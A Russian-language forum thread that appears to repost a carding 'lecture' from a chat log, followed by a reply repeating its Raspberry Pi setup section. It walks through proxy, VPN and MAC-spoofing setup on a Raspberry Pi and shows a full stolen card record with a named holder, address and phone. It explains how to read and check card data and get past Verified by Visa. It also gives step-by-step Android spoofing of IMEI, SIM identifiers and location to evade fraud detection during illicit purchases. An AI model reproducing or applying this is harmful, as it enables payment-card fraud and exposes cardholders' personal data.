sudo limonpptp -s - отсоединить
sudo limonpptp stop - отсоединить
sudo limonpptp poff - отсоединить


SOCKS Limon - подключение к proxy
===================
sudo limonsocks [тип] [IP] [порт] - прокси без авторизации
sudo limonsocks [тип] [IP] [порт] [логин] [пароль] - прокси с авторизацией
Изменить DNS - после слова limonsocks добавить аргумент -d [IP-DNS]
sudo limonsocks -s - отсоединить
sudo limonsocks stop - отсоединить

SSH Limon - подключение к SSH
===================
sudo limonssh [логин]@[IP] - подключиться к SSH (по умолчанию порт 22)
sudo limonssh [логин]@[IP]:[порт] - если у SSH другой порт, то вводить порт
Изменить DNS - после слова limonssh добавить аргумент -d [IP-DNS]
Ctrl+C - отсоединить


Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.

- Выбрать любую страну DNS

IP Limon - чек IP
====================
sudo limonip ip - мой ip
sudo limonip ip [IP] - другой IP/DNS
sudo limonip http [IP] [порт] - HTTP/S
sudo limonip http+ [IP] [порт] [логин] [пароль] - HTTP/S с авторизацией
sudo limonip socks4 [IP] [порт] - SOCKS4
sudo limonip socks4a [IP] [порт] - SOCKS4a
sudo limonip socks5 [IP] [порт] - SOCKS5
sudo limonip socks5+ [IP] [порт] [логин] [пароль] - SOCKS5 с авторизацией

Изменить основной DNS
===================
sudo limondns [IP-DNS]

Володя Путен, [09.09.19 13:58]
Многие так же задаются вопросом, можно ли менять МАС адрес на Raspbery - ответ: МОЖНО

Володя Путен, [09.09.19 13:58]
Подмена MAC
===================
sudo nano /etc/network/interfaces и расскоментировать (убрать решетку #)
----------------
#pre-up ifconfig ИНТЕРФЕЙС hw ether 00:00:00:00:00:00
----------------
Чтобы изменение применялось, перезагрузить малинку:
sudo reboot

Володя Путен, [09.09.19 13:58]
Если есть те кто еще не сильно знаком с кардингом. то разберем что такое сс, с чем его едят и как оно выглядит

Володя Путен, [09.09.19 13:58]
Что такое кредитная карта? Думаю, всем очевиден этот вопрос. Это карта с магнитной лентой и чипом, на котором хранится информация о состоянии нашего денежного баланса и тд

Володя Путен, [09.09.19 13:58]
С помощью магнитных лент и чипов мы расплачиваемся в магазинах, снимаем деньги в банкоматах, на карте так же отчеканы данные.

Володя Путен, [09.09.19 13:58]
Эти данные используются для осуществления онлайн покупок в интеренте

Володя Путен, [09.09.19 13:58]
На карте отбиты следующие данные: номер карты, имя фамилия владельца, дата истечения срока службы карты, с обратной стороны, там где должна быть подпись владельца, напечатан код безопасности из трех или пяти цифер, в зависимости от типа карты. О типах мы поговорим позже.

Володя Путен, [09.09.19 13:58]
Итак, как же выглядит сс? А выглядит оно вот так:

Володя Путен, [09.09.19 13:59]
4270 8150 0144 9160 | 01 | 19 | 506 | 10128 | US | NY | New York | 1199 Park Avenue, Apt. 7F | Robert J Von Phul | 6465300364 | classic | credit | usaa savings bank | male | [email protected] DBdec/2016 | Approve |

Володя Путен, [09.09.19 13:59]
первые 16 цифр, разделенные по 4 (в разных шопах по разному, есть разделенные и неразделенные, но везде 16 цифр) - это номер карты

Володя Путен, [09.09.19 13:59]
У карт есть брэнды. В США их 4 основных: VISA, MasterCard. American Express и Discovery

Володя Путен, [09.09.19 13:59]
Начимся их отличать. Visa ВСЕГДА начинается с цифры 4, Mastercard начинается с цифры 5, Discovery с цифры 6 и Amex с цифры 3

Володя Путен, [09.09.19 13:59]
Номер карты генерируется по специальному алгоритму. Причем первые 6 цифр для конкретного взятого банка являются константой. Они называются Bin - bank identification number.

Володя Путен, [09.09.19 13:59]
То, что эти 6 цифр постоянны, очень полезно для нас, кардеров, поскольку с помощью них мы можем осуществить поиск и покупать аналогичные карты того же банка

Володя Путен, [09.09.19 13:59]
Далее, 01 19 - это месяц и год истечения карты. В шопах частенько вместо 01 могут писать January, 02 - February и тд. По этому учим названия месяцев по английски

Володя Путен, [09.09.19 13:59]
19 - это, понятно, год. В некоторых шопах используется четырехзначное значение - 2019

Володя Путен, [09.09.19 13:59]
606 - это защитный код карты. Он называется по разному: Card Verification Number (CVN), CVV, CVV2, CSC (Card Security Code)

Володя Путен, [09.09.19 13:59]
10128 - это ZIP, postal code. Почтовый индекс адреса владельца карты.
Это очень важная вещь для карты, потому что многие мерчи сверяют именно зип карты

Володя Путен, [09.09.19 13:59]
US - это код страны

Володя Путен, [09.09.19 14:00]
Причем надо отметить, что иногда бывает так, что карта выпущена банком, не являющимся частью американской банковской системы, но имеет американский биллинг адрес. Таких карт много из канады, допустим. Тут надо смотреть по обстоятельствам.

Володя Путен, [09.09.19 14:00]
NY - это код штата Штатов в америке 50. Причем в некоторых шопах пишут полное название штата при выборе на чекауте

Володя Путен, [09.09.19 14:00]
New York - город. Город может записываться по разному, если он имеет сложное название, скажем, Fort Lauderdale пишут и Ft. Lauderdale. Советую писать информацию полностью согласно тому. как пишет ее владелец карты.

Володя Путен, [09.09.19 14:00]
1199 Park Avenue, Apt. 7F - это адрес, и он может записываться тоже по разному, для адреса на чекауте предоставляется 2 строки, на первой пишется номер улицы, на второй пишется номер квартиры, если дом многоэтажный. Можно эту информацию по разному записывать, можно записать все на одной строке. После Avenue пробел и сразу Apt. Можно на второй перенести, тут как кому больше нравится

Володя Путен, [09.09.19 14:00]
Robert J Von Phul - это имя кх (кх = Card Holder, то есть владелец карты) на карте. если нужно написать first и last name, то выбрасывается инициал middle name/ Если нужно записать как написано на карте, то пишите полностью. Потому что инициалы действительно отпечатывают на картах в качестве части имени. Далеко не все мерчи могут проверять имя, например, пейпал (PayPal)

Володя Путен, [09.09.19 14:00]
По этому, если вам попалась организация, не паникуйте. На карте действительно вместо людских имен бывают имена организаций. В некоторых случаях я допускал писать имя организации в точности, как написано на карте, в некоторых я просто менял это имя на человеческое.

Володя Путен, [09.09.19 14:00]
6465300364 - десятизначный номер телефона кх. Вот тут внимание, тут тоже много вариантов. Если у шопа есть доступ в БГ или он прозванивает банк, не советую менять номер. Если шоп небольшой и прозванивает только что бы подтвердить то, что вы указали в ордере, тогда можно менять на единичку в конце и прозванивать с подменой номера. Обычно этим занимаются стафферы (те кто вбивает товар)

Володя Путен, [09.09.19 14:00]
Иногда случаются ситуации, когда вы купили сс, а у нее нет данных по номеру. Такое действительно случается и тут я рекомендую либо воспользоваться поиском по личностям intelius.com. Осуществляет поиск по public records - публичным данным, и порой неплохую выдает поднаготную на товарищей с редкими именами


Володя Путен, [09.09.19 14:00]
classic - это уровень карт, от уровня карт зависят различные параметры вроде кредитного лимита и тд. К сожалению, не всегда уровень карты свидетельствует о том, что на ней будет куча бабла. Тут надо опять же заниматься статистической выборкой и формировать свой список бинов. Допустим, когда я вскрыл баг в одном шопе, мне нужен был бин, авторизующий 10к баксов, такой ордер, естественно, будет отменен, но мне нлавное, что бы прошла авторизация.

Володя Путен, [09.09.19 14:01]
Я нашел несколько бинов уровня business. Вот на business картах с большой долей вероятности будет большая сумма денег, хотя встречаются и нищеброды-американцы, к сожалению, даже на business имеющие не более 300 баксов. Есть еще такой уровень карт - prepaid. Очень не рекомендую его покупать в связи с тем, что это карты немногократного использования, часто используются в качестве гифтов. Такие карты как правило не пополняются, сколько есть на них денег - столько и тратится и они лежат с нулевым балансом

Володя Путен, [09.09.19 14:01]
usaa savings bank - это банк. Не слишком буду углубляться в банковскую систему США, отмечу только что у них есть как правило банки, кредитные организации и карты корпораций. Банков великое множество, есть популярные, есть не очень. У всех разные капиталы и число держателей счетов и карт. Самые популярные банки в США - Bank of America, Chase, Capital One.

Володя Путен, [09.09.19 14:01]
Соответственно их карты в шопах с большой долей вероятности вбиваются другими кардерами. Есть много хороших и не сильно задроченных банков - pnc bank, huntington national bank, compass bank, world foremost bank.

Володя Путен, [09.09.19 14:01]
Кредитные организации (credit union) - это еще один тип кредитных учреждений в США, которые занимаются ссудами, ипотеками и еще много чем. У них тоже есть популярные и малоизвестные кредитные организации локальных масштабов. Одним из самых популярных кредит юнионов является navy fcu.

Володя Путен, [09.09.19 14:01]
так же есть организации, занимающиеся процессингом платежей по картам, и корпорации, выпускающие кредитные карты, допустим, pulse network llc, star processing, computers networks. На их картах можно с различной вероятностью найти деньги для снятия. Вот например, pulse network я снимал по 700 баксов с саморега PayPal. Star Processing послабее, где-то 150.

Володя Путен, [09.09.19 14:01]
male - этот параметр предоставляется не во всех шопах. Пробив человека по базе имен и соотнесение имени с полом. Иногда имена имеют неясное отношение к конкретному полу, по этому пишут unisex. Данная информация полезна для изменения голоса на противоположный пол. male - мужчина, female - соответственно женщина.

Володя Путен, [09.09.19 14:01]
[email protected] - это имейл кардхолдера. как правило, не относится к биллинг данным, вместо него мы всегда указываем свой, но туда частенько приходят отчеты от банка по просмотру стейтмента и трат, по этому при желании можно использовать софт или сервис и заспамить эту почту.

Володя Путен, [09.09.19 14:02]
Approve - это статус карты. перед покупкой можно чекнуть карту на валид и в случаи невалида деньги всегда вернутся вам на счет, в шопах у которых допустим есть чек на валид. Тут можно целую дискуссию проводить, стоит или не стоит чекать карты свежих баз на валид перед покупкой. бытует мнение, что чекеры портят карты.

Володя Путен, [09.09.19 14:02]
В принципе, от части это убеждение не лишено оснований. Потому что чекеры имеют одинаковые мерчи для процессинга карт и это может портить карты, особенно одних и тех же банков. Я бы рекомендовал проверять карты на валид перед покупкой с помощью бесчарджевого чекера simple. Нам очень важно, что бы адрес и сама карта были валидными.

Володя Путен, [09.09.19 14:02]
Теперь поговорим об ответах чекера карт. Может сложится ситуация, когда мы купили лишнюю карту или же она не вошла в палку и мы отложили ее до лучших времен, и вот эти времена настали. Хотелось бы чекнуть эту карту еще раз перед вбивом в шоп.

Володя Путен, [09.09.19 14:02]
Тут я рекомендую сервис

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.

.

Володя Путен, [09.09.19 14:02]
Выбираем чекер и карта проверяется. В зависимости от валидности, нам могут показывать следующие коды:

Володя Путен, [09.09.19 14:02]
00, 85 - это значит платёж успешно проведён, всё хорошо
05 - Do not honour - банк отклонил транзакцию без объяснения причин. значит деклайн. самая частая причина
43 - Pickup card, fraud account - карта возвращается в банк на перевыпуск из-за мошенничества, похожий код есть в случае простой потери карты
14 код - invalid card number - тоже означает, что карта перевыпущена и удалена из БД банка
AVS not match - значит не совпадает адрес. Кх переехал и изменил биллинг данные

Володя Путен, [09.09.19 14:03]
Еще мне бы хотелось отдельно поговорить вот о какой вещи, о том, как осуществляется процессинг карты. Он может осуществляться как с помощью карт Verified by Visa (для Visa) и 3DSecure (для MasterCard), так и без них. Первый случай не очень часто распространенный, но в большинстве платежных систем он есть.

Володя Путен, [09.09.19 14:03]
Карты могут быть vbv и novbv - тоесть к ним могут быть подключены системы верификации платежа платежным паролем или не подключены. Надо отметить, что без vbv трудно проводить платежи. Часто платеж деклайнится. Как быть с vbv? Тут есть 3 варианта развития событий

Володя Путен, [09.09.19 14:03]
Карты могут быть "преэнроллены" для создания вбв-пароля, и что бы создать этот пароль, для каждого бина - бина, отмечу, даже не банк - есть свои правила. Практически всегда указываются данные с карты: имя, зип, свв2, дата истечения срока. Но вот только есть бины, в которых достаточно информации про зип, что бы создать платежный пароль. Есть бины, в которых нужно указать ссн и доб (SSN - идентификационный номер кх, DOB - дата рождения кх).

Володя Путен, [09.09.19 14:03]
А есть бины, где сложная система, вроде usaa saving bank, там надо еще какуюто информацию о кх указать, то есть без БГ не обойтись.

Володя Путен, [09.09.19 14:03]
3S Secure - это примерно то же, что и vbv, но уже касательно MasterCard кард. Для Discover, Amex не предусмотрнены такие защитные механизмы. Для вбивов советую использовать Visa, MC, реже - Discover.

Володя Путен, [09.09.19 14:03]
На этом мини лекцию по сс мы и закончим.

Володя Путен, [09.09.19 14:03]
теперь разберем вбив с телефона. Я его гдето вычитал, потестил, достаточно удачно, даже очень удачно. Вбив с телефона на ведре (android)

Володя Путен, [09.09.19 14:03]
Настроить под вбив андроид может любой человек при наличии прямых рук и головы. Есть два типа вбива с телефона, собственно как и два типа людей: 1) те, кто не особо хочет копаться, это вбив с браузера телефона; 2) это вбив с приложения. Вариант гораздо сложнее, но в целом может каждому пригодится.

Володя Путен, [09.09.19 14:04]
Первое что необходимо сделать - это получить root права на телефоне. Я использую Kingo root, скачиваю apk файл и устанавливаю, самый простой и эффективный метод получения root прав.

Володя Путен, [09.09.19 14:04]
Весь список софта для андроида:
1. Kingo root
2. xposed installer (framework)
3. device id changer Pro
4. Proxy Droid
5. DNS Forwarder
6. xprivacy
7. ccleaner
8. root cloak
9. Location cheater

Володя Путен, [09.09.19 14:04]
Для вбива с приложения вам просто необходим xposed framework, без него у вас вряд ли что получится или если вы меняете телефоны после каждого вбива - тогда да, можно обойтись и без этого софта. Но думаю это экономически не выгодно по этому юзаем именно этот софт. Это системная программа для изменения настроек прошивок (версий OS)

Володя Путен, [09.09.19 14:04]
device id changer Pro - программа меняет идентификационные данные о железе вашего телефона (imei например) и другие параметры, это модуль xposed frameworka

Володя Путен, [09.09.19 14:04]
Proxy droid - через него ставим соксы, но если вы будете подключаться к Raspberry на который вы будете надевать сокс, то в принципе вам эта программа нафиг не нужна.

Володя Путен, [09.09.19 14:04]
DNS Forwarder - иногда, так случается, при подключенном носке отображается неверный DNS, в таком случаи юзаем этот софт и меняем DNS на тот, который нам необходим. Список DNS я скидывал ранее когда объяснял о настройку Raspberry и смены DNS на нем.

Володя Путен, [09.09.19 14:04]
ccleaner - полагаю все знают что это такое, но для тех кто не знает: после каждого вбива этим софтом мы будем чистить телефон

Володя Путен, [09.09.19 14:04]
Location cheater - служит для подмены данных местоположения

Володя Путен, [09.09.19 14:04]
root cloak (модуль framework) - служит для того, что бы скрывать от других приложений. что телефон имеет root права

Володя Путен, [09.09.19 14:05]
xprivacy - это софт, который подменяет симкарту и не только: он либо разрешает, либо запрещает видеть определенные сведения всем приложениям. В дополнение к ней я бы советовал приложение sim card, на нем можно отточить то что запрещать, а что разрешать приложениям видеть, что бы в них отображалась корректная информация об устройствах.

Володя Путен, [09.09.19 14:05]
Все приложения (кроме ccleaner) не работают без root прав.

Володя Путен, [09.09.19 14:05]
Сначала ставим xposed installer, после того как получили root права, через него устанавливаем framework. Скажу сразу, здесь мы столкнемся с трудностями поставить фреймворк, нам нужен андроид версии 4.4.4 (на него проще всего поставить эту прогу), на версиях выше сделать это крайне проблематично, но если вы умеете ставить кастомный рекавери и прошивать архивы то можете попробовать. В остальом советую у кого прошивка выше, откатить самим на ведро 4.4.4 или отнести в серсивный центр и вам там прошьют, стоит это не дорого. Плюс на 4.4.4 гораздо удобнее работать, чем на версиях выше.

Володя Путен, [09.09.19 14:05]
Вот ссылка на 4pda, там найдете инсталлер на 4.4.4.(и версии выше)

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.



Володя Путен, [09.09.19 14:05]
После того ткак поставили xposed framework ставим следуюющие программы:

Володя Путен, [09.09.19 14:05]
device id changer Pro. Прошу обратить внимание, именно Pro версию!!! Дальше Proxy Droid (в случаи необходимости), DNS Forwarder, ccleaner, Location cheater, xprivacy, и root cloak. xprivacy и root cloak ставится внутри xposed installer,заходим в раздел Загрузка и там в поиске их изем и устанавливаем.

Володя Путен, [09.09.19 14:05]
Ну и важное примечание: apkpure.com сразу сайт добавьте в закладки, и скачать приложения sim card (зеленая симка на ярлыке)

Володя Путен, [09.09.19 14:05]
Когда вы поставили все выше перечисленные программы, нужно зайти в xposed installer, раздел Модули, и поставить галочки на всех модулях (device id ch/root cloak/xprivacy)

Володя Путен, [09.09.19 14:06]
Потом зайти в раздел фремворка и прожать быстрая перезагрузка, что бы модули установились, если этого не сделать модули не будут корректно работать.

Володя Путен, [09.09.19 14:06]
Собственно по установке на андроид - все. теперь поговорим об xprivacy, очень полезная штука когда работаешь с серьезными шопами, банками и тд, лично я его юзаю для подмены сим карты, по факту возможностей на много больше.

Володя Путен, [09.09.19 14:06]
Заходим в него и переходиим в раздел параметры, трогаем только те значения что связаны с симкой:

Володя Путен, [09.09.19 14:07]
А это:
номер телефона
MCC
MNC
код страны
оператор
ICC ID
ID подписки

Володя Путен, [09.09.19 14:07]
Возьмем за основу номер 4356681778, если ктото подстраивается под холдера и ему нужно пробить оператора, идем сюда

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.



Володя Путен, [09.09.19 14:07]
Что такое МСС - с этим можете ознакомиться здесь:

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.

, из этой же страницы можете взять значение для нашего параметра в проге

Володя Путен, [09.09.19 14:07]
MNC это код оператора, посмотреть код нужного оператора (нажной страны) вы можете так же здесь:

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.

.

Володя Путен, [09.09.19 14:07]
теперь что такое icc id и id подписки, и как его прописать

Володя Путен, [09.09.19 14:07]
icc id это серийный номер симки, который состоит из 19 цифрю

Володя Путен, [09.09.19 14:07]

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.



Володя Путен, [09.09.19 14:07]
Первые 2 цифры 89 всегда ставятся по дефолту, это относится к отрасли, ее идентификатор. дальше то что выделено, это идет код страны, длиной от 1 до 3 цифр.

Володя Путен, [09.09.19 14:08]

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.



Володя Путен, [09.09.19 14:08]
По юсе это 01, по другим странам значения отличаются

Володя Путен, [09.09.19 14:08]
Так поскльку мы подстраиваемся под юсу, в значении ICC ID первые 4 цифры будут всегда 8901, а остальные 15 цифр можно писать рандомно.

Володя Путен, [09.09.19 14:08]
ID подписки (в xprivacy). А вообще это называется sim imsi. Как его прописать? Смотрим картинку.

Володя Путен, [09.09.19 14:08]

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.



Володя Путен, [09.09.19 14:08]
Он всегда состоит из 15 цифр. Прописываем сначала значение MMC, затем MNC, затем остальные цифры пишем рандомно, что бы в итоге было 15 сиволов в этом поле

Володя Путен, [09.09.19 14:08]
Как сделать что бы данные подменялись, когда устанавливаете новое приложение: xprivacy кидает уведомление, и те данные что нужно подменить, нажимаете на кнопку запретить (deny)

Володя Путен, [09.09.19 14:08]
и вот тут пригодится приложение Sim card, которое поможет набить руку какие начения подменять

Володя Путен, [09.09.19 14:08]
Теперь опишу как происходит вбив

Володя Путен, [09.09.19 14:08]
Если вы уже подключили носок (сокс, туннель, не важно) в Raspberry, подключились к нему по WIFI сети с мобильного, то идем на whoer.net, смотрим какой часовой пояс, идем в настройки, ставим часовой пояс и язык под холдера

Володя Путен, [09.09.19 14:08]
Потом в location cheater задаем координаты, я обычно ставлю в пару метров от нужного адреса (под айпи или шип)

Володя Путен, [09.09.19 14:09]
идем опять на whoer.net, и смотрим все ли нормально поставилось.

Володя Путен, [09.09.19 14:09]
Что бы проверить работает ли location cheater или нет, скачиваем гугл карты, и там смотрим (нажать на кнопку мое местоположение)

Володя Путен, [09.09.19 14:09]
Если все работает то скачиваем нужное приложение. Потом открывает root cloack, заходим в первый раздел (добавить\удалить приложение) и надимаем на плюсик, и ищем наше приложение, после этого что бы сохранить настройки заходим xposed installer, раздел фреймворк, и нажимаем быстрая перезагрузка. После этого даже если вы удалите приложение, его запомнит root cloak и делать этого каждый раз не нужно

Володя Путен, [09.09.19 14:09]
После вбива, что бы начать следующий, нужно зайти в device id changer, в первом разделе device id нажать random all и apply, затем зайти в xposed installer раздел фрейворк , и нажать быстрая перезагрузка, тобы железо поменялось.

Володя Путен, [09.09.19 14:09]
И так собственно мы научились подменять данные, железо, местоположение и так далее. Теперь заново ставим приложение и вбиваем, не забываем менять данные в xprivacy. Если надо условно бить палку перебором и что бы каждый раз не качать приложение, не регать гугл акк что очень напрягает, юзаем сайт apkpure.com, там можно скачать приложение и добавить его на телефон

Володя Путен, [09.09.19 14:09]
То есть как отработали акк, удалили, поменяли данные, перезагрузили устройство, просто устанавливаете приложение заново

Володя Путен, [09.09.19 14:09]
Теперт перейдем к вбиву с браузера

Володя Путен, [09.09.19 14:09]
Здесь все намного проще, в целом любая версия андроида подходит для работы

Володя Путен, [09.09.19 14:10]
Для вбива нам необходимо:
1) Сам браузер ( chrome, firefox, родной браузер телефона и тд)
2) ссleaner (или менеджер приложений есть априори на каждом андроиде)
3) proxy droid (в случаи необходимости, если вы не используете Raspberry).
4) DNS Forwarder
5) Location cheater (браузеры в целом запрашивают gps данные, имеет смысл координаты подменить под ip)

Володя Путен, [09.09.19 14:10]
В случаи работы с браузером, железо менять не обязательно, но переустанавливать браузер желательно, и чистить его. Вбив почти такой же как и с приложения, просто пропускаем пункты с device id changer/root cloak/xprivacy.

Володя Путен, [09.09.19 14:10]
В основном бьют с моззилы (так ак там webrtc отключается так же как и на компе), либо с родного браузера (на новых версиях андроида - редкость)

Володя Путен, [09.09.19 14:10]
Чистим кэш (и историю) через ccleaner или менеджер приложений после каждого вбива обязательно

Володя Путен, [09.09.19 14:10]
В целом на сегдня все. Надеюсь лекция была полезна для каждого из вас, и все вы пришли сюда не просто почитать информацию. но и планируете работать.
 

BadX

Постоянный участник
PREMIUM USER
ДРУЗЬЯ ФОРУМА
ЮБИЛЕЙНАЯ ЛЕНТА

BadX

Постоянный участник
PREMIUM USER
ДРУЗЬЯ ФОРУМА
ЮБИЛЕЙНАЯ ЛЕНТА
Регистрация
8 Окт 2018
Сообщения
166
Симпатии
136
eRUB
1,492
#2
Как-то лекция прошла мимо меня, ауди в теме не написал ни где будет, ни во сколько. Ладно хоть логи выложили, а так-то я ждал, даже отслеживать тему ставил https://skynetzone.org/threads/lekcija-ot-audi-besplatno.14949/

Текст без надписи "Володя Путен, [Дата, время]" (поудобнее читать и места меньше занимет):
Приветствую вас, дорогие друзья

На лекции мы поговрим о таком замечательном устройстве как Raspberry. Это миникомпьютер, который можно использовать абсолютно для разных целей: кардинг, безопасность, взлом WiFi, SSH, VPN, SOCKS... Я обучу вас настройке и использование этим чудо устройством под названием Raspberry. Он очень мобилен, его можно брать с собой практически везде, поместив его в карман своей куртки или рюкзака. А так же мы подробно поговорим об настройки ведра (андроида) под вбив (для кардеров), и разберем все нюансы касающиеся сс.


Темы лекции:

1. Запись образа, настройка и подключение через терминал по SSH.

2. Маленький FAQ по командам для терминала Raspberry.

3. Настройка Raspberry. Подробно и много.

4. Взлом WIFI. Подробно.

5. OPEN VPN. Настройка и подключение. Запрет трафика при обрыве.

6. PPTP. Скрипт от LimonCorp.

7. SOCKS4, SOCKS4a, SOCKS5, SOCKS5+.

8. SSH.

9. Ip Limon. Команды для чека IP адресов, в том числе и SOCKS.

10. Подмена MAC адреса на Raspberry

11. Картинг. Soft для телефона, использование и настройка. Подробно.

12. Мини лекция по сс (картам).

================================================================

В сегодняшней лекции конкретика будет касаться безопасной и прекрасной работы с распбери

купить девайс можно например здесь:

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.



или в рф на авито

или в укр на олх

На лекции мы поговрим о таком замечательном устройстве как Raspberry. Это миникомпьютер, который можно использовать абсолютно для разных целей: кардинг, безопасность, взлом WiFi, SSH, VPN, SOCKS... Я обучу вас настройке и использование этим чудо устройством под названием Raspberry. Он очень мобилен, его можно брать с собой практически везде, поместив его в карман своей куртки или рюкзака. А так же мы подробно поговорим об настройки ведра (андроида) под вбив (для кардеров), и разберем все нюансы касающиеся сс.

Для тех кому интересны атаки на вайфай сети я советую приобрести адаптер и антену

Адаптер:

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.



Антены:

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.



Мои рекомендации по поводу адаптера и антены:

Адаптер:

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.



Стоит заметить что текущий адаптер требует к себе две антены, это денежно затратно но оно того стоит

Антены советую брать эти, 2 шт:

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.



Позже мы поговорим более подробно на эту тему

Итак, что же такое Raspberry:

Raspberry - это одноплатный миникомпьютер, чуть больше пачки сигарет, или совсем новые модели чуть больше пачки спичек. Их существует несолько видов, модель Zero, модели B/B+/2B/3B/3B+, модель A+/3A+.

Состоит он из четырехслойной печатной платы, дополнительно к нему применяются блок питания, флэшка, корпус, а так же при необходимости и усиленная WIFI антена. Сегодня мы разберем пример работы данного устройства модели Raspberry Pi 3B+. Отличие это модели от ее предшественников является встроеный 64 битный процессор, а так же наличие собственного WIFI и Bluetooth. Как я выше уже упомянул, есть и более новые версии, в которых отличие это лишь компаткность (он размером с пачку спичек) а так же отсутствием некоторых выходов (-2 USB например). Хз надо вам эта инфа или нет, но вы читайте :)

У Разбери есть своя ОС, основанная на UNIX системе DEBIAN, ну чем отличается тот же Windows от Linux, почему Linux безопасней, я рассказывать сегодня не буду. Так же на Raspberry можно установить и Kali Linux, возникший как результат слияния WHAX и Auditor Security Collection. Но сегодня мы тренируемся именно на образе предназначенному для этого миникомпьютера.

Я заранее подготовил, скачал и установил этот образ, именно STREТCH версии, что значит "укрощенная", то есть без DESCTOP, без рабочего стола. Использовать для управления я буду лишь консоль (терминал).

Необходимый софт на ноуте для записи Raspberry:

bitvise - через битвайс будем управлять малинкой.

Rufus - форматирование сд и запись

Advanced IP Scanner - сканер айпи.

2018-11-13-raspbian-stretch-full.img - образ линукса

Создать файл ssh без расширения в корне SD

установка до воли простая, ничем не отличающаяся от установки других юникс систем.

Вставляем сд в пк

Открываем Rufus, выбираем образ и нажимаем "Запись"

Все как обычно и ничего сложного.

Дальше НЕОБХОДИМО ОБЯЗАТЕЛЬНО зайти на флэшку, и создать в корне СД файл под названием ssh , без разширения и пустой

Он необходим нам для нальнейшего подключения к Распбери

Извлекаем SD и вставляем в Raspberry, подключить LAN от Raspberry к роутеру и включить Raspberry.

Теперь нам необходимо узнать IP нашего Raspberry.

Есть два способа.

1. Узнать через админку в своем роуетере

2. Узнать с помощью Advanced IP Scanner

Используем вариант №2.

Запускаем Advanced IP Scanner, пишем диапазон айпи адресов, например 192.168.0.1-254, и нажимаем Scan.


Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.



И вот наше Raspberry первое в списке, и его ип у меня 192.168.0.1.

Так же можно подключиться напрямую к Raspberry по WIFI, но об этом мы поговорим потом, для начала нужно его настроить.

IP = 192.168.43.1 - если подключаться по WIFI напрямую

Port = 22

На Raspberry по умолчанию логин: pi , пароль: raspberry, порт: 22

Запускаем bitvise, вводим текущие данные доя подключения, и нажимаем LOGIN


Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.



Немножко теории при работе в терминале Linux. Мы будем использовать ряд команд, которые на первый взгляд кажутся сложными, не веселыми :) и не понятно будет, зачем я взял версию STREТCH без рабочего стола. Все просто - мобильность. Я же не буду с собой таскать монитор, например в дальних путешествиях. Я Raspberry бросил в карман и поехал. И при необходимости подключился к нему по WIFI с ноутбука или телефона, и сделал то что мне необходимо.

Немного команд которые есть жизненно необходимыми. Запишите их себе сразу в блокнотик

sudo - дает права администратора

apt-get - менеджер пакетов для линукса на базе debian

update - обновление

install - установка

cp - копирование файла или папки

mv - перемещение файла или папки

rm - удаление файла или папки

sudo -s - зайти в учетку как root (администратор)

nano - текстовый редактор в терминале, он умеет также создать новый файл, если его нет.

cat - почитать файл

ls - посмотреть что есть в папке

ifconfig - выводить активные сетевые интерфейсы (карты)

ifconfig -a - выводить все активные и неактивные интерфейсы.

iwconfig - вывод беспроводных интерфейсов.

/etc/ssh/sshd_config - это директория /папка/папка/файл.

Горячие клавиш в Nano:

ctrl+O - сохранить файл. будет спрашивать сохранить ли, нажимать Enter

ctrl+X - выход из нано

ctrl+K - стереть строку

Что бы вставить заранее скопированную строку/код/команду в терминале - один раз нажать правую кнопку мыши в терминале

Пример как создать текстовый файл:

sudo nano text.txt

Почитать файл

sudo cat text.txt

Первое что мы сделаем, это изменим порт для подключения.

Конфигурировать ssh на Raspberry, чтобы во время работы в bitvise связь не пропала и изменить стандартный порт 22 на другой например 2200

sudo nano /etc/ssh/sshd_config и добавить в конце файла коды

Port 2200

ClientAliveInterval 300

ClientAliveCountMax 60

Вставил, сохранил и вышел из нано.

Далее пишем в терминале команду ifconfig

Эта команда означает "Показать сетевые интерфейсы"


Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.



Вот так они выглядят. на первый вид хаос полнейший

Но ничего, со временем к этому привыкаешь быстро и на глаз становится все понятным

eth0 - это LAN малинки

wlan0 - встроенный вифи малинки.

Когда подключите адаптер вифи к малинке, то появится имя wlan1.

Что бы посмотреть ВСЕ доступные интерфейсы, добавьте к команде аргумент -а

sudo ifconfig -a

Приступим к конфигурации. Она необходима будет для каждого. Сделал один раз и все.

Конфигурируем interfaces

sudo nano /etc/network/interfaces

и добавить В КОНЦЕ конфига код:

auto eth0

iface eth0 inet dhcp

allow-hotplug wlan0

iface wlan0 inet dhcp

#pre-up ifconfig wlan0 hw ether 00:00:00:00:00:00

wpa-conf /etc/wpa_supplicant/wpa_supplicant.conf

iface default inet dhcp

auto wlan1

iface wlan1 inet manual

#pre-up ifconfig wlan1 hw ether b8:27:eb:00:00:00

auto br0

iface br0 inet static

address 192.168.44.1

netmask 255.255.255.0

bridge_ports wlan1

Решетка на против строки обозначает "закомментрировать", то есть закомментрированная строка работать не будет. Что бы строка работала, ее необходимо раскомментировать, то есть убрать решетку. В данный момент оставляем все как есть.

Дальше переходим к установке необходимых библиотек для работы hostapd, dnsmasq, bridge-utils

sudo apt-get install -y hostapd

sudo apt-get install -y bridge-utils dnsmasq

sudo nano /etc/hostapd/hostapd.conf

И вставить код

ssid=WIFI_Limon

wpa_passphrase=12345432

interface=wlan1

bridge=br0

driver=nl80211

hw_mode=g

channel=6

ieee80211n=1

wmm_enabled=1

